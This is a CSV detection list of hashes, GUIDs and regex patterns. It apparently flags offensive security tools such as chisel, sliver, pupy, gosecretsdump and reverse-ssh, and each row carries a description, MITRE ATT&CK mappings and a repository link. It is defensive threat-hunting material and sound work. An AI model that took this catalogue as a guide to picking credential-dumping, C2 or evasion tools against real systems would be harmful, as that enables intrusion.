"*182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202*",".{0,1000}182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64*",".{0,1000}184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c*",".{0,1000}1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*189219A1-9A2A-4B09-8F69-6207E9996F94*",".{0,1000}189219A1\-9A2A\-4B09\-8F69\-6207E9996F94.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482*",".{0,1000}189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*18A66118-B98D-4FFC-AABE-DAFF5779F14C*",".{0,1000}18A66118\-B98D\-4FFC\-AABE\-DAFF5779F14C.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b*",".{0,1000}18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*18C681A2-072F-49D5-9DE6-74C979EAE08B*",".{0,1000}18C681A2\-072F\-49D5\-9DE6\-74C979EAE08B.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24*",".{0,1000}18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed*",".{0,1000}18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782*",".{0,1000}18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181*",".{0,1000}1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf*",".{0,1000}1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88*",".{0,1000}19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*192.168.0.110:1234*",".{0,1000}192\.168\.0\.110\:1234.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*192.168.1.229 Passw0rd!*",".{0,1000}192\.168\.1\.229\sPassw0rd!.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731*",".{0,1000}1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa*",".{0,1000}193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa*",".{0,1000}197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68*",".{0,1000}198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea*",".{0,1000}198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b*",".{0,1000}199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7*",".{0,1000}19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1*",".{0,1000}19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a*",".{0,1000}19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1*",".{0,1000}19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*1a279f5df4103743b823ec2a6a08436fdf63fe30*",".{0,1000}1a279f5df4103743b823ec2a6a08436fdf63fe30.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2*",".{0,1000}1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459*",".{0,1000}1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe*",".{0,1000}1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1A8C9BD8-1800-46B0-8E22-7D3823C68366*",".{0,1000}1A8C9BD8\-1800\-46B0\-8E22\-7D3823C68366.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea*",".{0,1000}1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba*",".{0,1000}1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7*",".{0,1000}1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1AFD1BA3-028A-4E0F-82A8-095F38694ECF*",".{0,1000}1AFD1BA3\-028A\-4E0F\-82A8\-095F38694ECF.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*1B1F64B3-B8A4-4BBB-BB66-F020E2D4F288*",".{0,1000}1B1F64B3\-B8A4\-4BBB\-BB66\-F020E2D4F288.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2*",".{0,1000}1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a*",".{0,1000}1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1B3C96A3-F698-472B-B786-6FED7A205159*",".{0,1000}1B3C96A3\-F698\-472B\-B786\-6FED7A205159.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec*",".{0,1000}1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1B52A3D9-014C-4CBF-BB98-09080D9A8D16*",".{0,1000}1B52A3D9\-014C\-4CBF\-BB98\-09080D9A8D16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c*",".{0,1000}1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852*",".{0,1000}1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90*",".{0,1000}1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031*",".{0,1000}1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266*",".{0,1000}1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*1BACEDDC-CD87-41DC-948C-1C12F960BECB*",".{0,1000}1BACEDDC\-CD87\-41DC\-948C\-1C12F960BECB.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9*",".{0,1000}1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c*",".{0,1000}1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 